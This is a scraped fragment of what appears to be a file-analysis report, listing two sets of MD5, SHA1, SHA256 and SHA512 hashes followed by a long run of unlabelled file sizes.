MD5a18c2165eca83b60b14010fddb2dab12
SHA199f56e0e02b2f12d2ba96380b8410977cec61a42
SHA256aebf224697035142a1448fb6653cf3c85fb23fa92713ff6bc84c65bbc187040d
SHA51258aadd355a0f89f6657acab51ac3dcb76ad037dcd05d7df375fc8f71981f02e9d7aff62b808ce26ba92f863df16099eefe722cda066aba2d03438270fcb55f48
-
Filesize
3KB
MD548328b99df8af9ae9f83f4eedda844c2
SHA17522860dacea9e8716c2dacfc8866f22abc23b5a
SHA25667e69dd78f613b9775dbb1f7320e11a39f6bf7dae79d006a28ac5d5c91cef6f9
SHA512137f27ee94332087ed02a884e623fa7a176cf78d16c3e93c77bc8cbba82aa3b949fab0d6201f78937eee922d3f0d0bc34ce9cc70aa61935c7b44415f8ca7e695
-
Filesize
304KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.6MB
-
Filesize
496KB
-
Filesize
352KB
-
Filesize
624KB
-
Filesize
408KB
-
Filesize
472KB
-
Filesize
272KB
-
Filesize
5.4MB
-
Filesize
1.1MB
-
Filesize
192KB
-
Filesize
1.4MB
-
Filesize
704KB
-
Filesize
6.0MB
-
Filesize
3.4MB
-
Filesize
160KB
-
Filesize
72KB
-
Filesize
104KB
-
Filesize
2.0MB
-
Filesize
192KB
-
Filesize
2.5MB
-
Filesize
1.5MB
-
Filesize
256KB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
56KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
944KB
-
Filesize
944KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
39.3MB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
